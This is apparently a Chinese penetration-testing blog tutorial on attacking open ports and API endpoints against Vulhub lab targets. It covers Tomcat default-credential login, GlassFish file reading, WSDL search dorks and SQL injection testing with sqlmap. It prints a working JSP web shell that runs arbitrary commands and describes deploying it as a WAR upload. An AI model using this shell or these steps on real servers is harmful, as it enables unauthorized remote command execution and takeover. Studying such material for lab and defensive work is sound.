端口服务—针对开放端口进行攻击
一个服务器往往会运行很多服务,比如web数据库啊等,那么就会开放很多端口对外,我们可以根据不同的端口来构造不同的攻击,从而达到拿到目标服务器权限的目的。
常见端口攻击面总结
这里有师傅总结好了直接放上,我们一般是信息收集碰到什么具体端口,再具体查询如何利用
Vulhub靶场案例
Tomcat弱口令案例
对该ip扫描发现8080端口开放,且运行上面的中间件为Tomcat
![图片[1]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-85-1024x300.png)
我们打开页面进行:
![图片[2]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-86-1024x750.png)
进行管理时发现需要认证:
![图片[3]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-87-1024x454.png)
这时可以进行bp抓包爆破弱口令,但是tomcat有个很知名的弱口令是tomcat/tomcat,我们尝试,成功登录。
![图片[4]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-88-1024x692.png)
创建jsp木马文件:shell.jsp
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[1024];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
生成war后缀文件:
![图片[5]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-89-1024x387.png)
进行上传:
![图片[6]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-90-1024x404.png)
连接后输入命令,拿到权限。
![图片[7]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-91-1024x608.png)
GlassFish 任意文件读取漏洞
![图片[8]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-92-1024x292.png)
发现4848端口开放
![图片[9]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-93-1024x620.png)
发现是GlassFish中间件,查找nday,找到任意文件读取,payload:
![图片[10]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-94-1024x95.png)
成功读到目标文件
![图片[11]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-95-1024x362.png)
端口弱口令检测工具
该工具对常见端口服务进行弱口令爆破检测,检测是否存在弱口令,可以自定义字典。
下载地址:https://github.com/shack2/SNETCracker/releases/
![图片[12]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-96-1024x828.png)
小tips
当我们进行目录扫描时候,比如我们的web文件目录为/var/wwwroot/drton1
域名为drton1 对应的ip为1.1.1.1
当进行目录扫描时我们填写扫描路径是域名drton1 我们扫描的当前路径为/var/wwwroot/drton1/xxx
当进行目录扫描时我们填写扫描路径是ip:1.1.1.1 我们扫描的当前路径为/var/wwwroot/xxx
如果此时在/wwwroot/目录下存在网站备份文件那么我们扫描域名是扫不到的,只能通过扫描ip来进行发现,所以实战时候ip也来扫一遍更妥
API服务—针对API服务进行攻击
详细知识漏洞发现:API 接口渗透测试 – 先知社区 (aliyun.com)
在测试的时候会发现很多接口,我们发现的原因一般是发现关键字等信息
如url里存在wsdl:
- inurl:jws?wsdl
- inurl:asmx?wsdl
- inurl:aspx?wsdl
- inurl:ascx?wsdl
- inurl:ashx?wsdl
- inurl:dll?wsdl
- inurl:exe?wsdl
- inurl:php?wsdl
- inurl:pl?wsdl
- inurl:?wsdl
我们此时再拿该网站丢到awvs进行web扫描进行常规安全测试即可。
![图片[13]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-97-1024x505.png)
发现SQL注入
![图片[14]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-98-1024x464.png)
发现具体注入字段:
![图片[15]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-99-1024x658.png)
我们找到具体注入字段进行标记,然后丢入sqlmap进行测试即可
![图片[16]-漏洞发现(四)API接口服务之漏洞探针类型利用修复-Drton1博客](https://www.yanyang.ink/wp-content/uploads/2023/01/image-100-1024x397.png)
请登录后发表评论
注册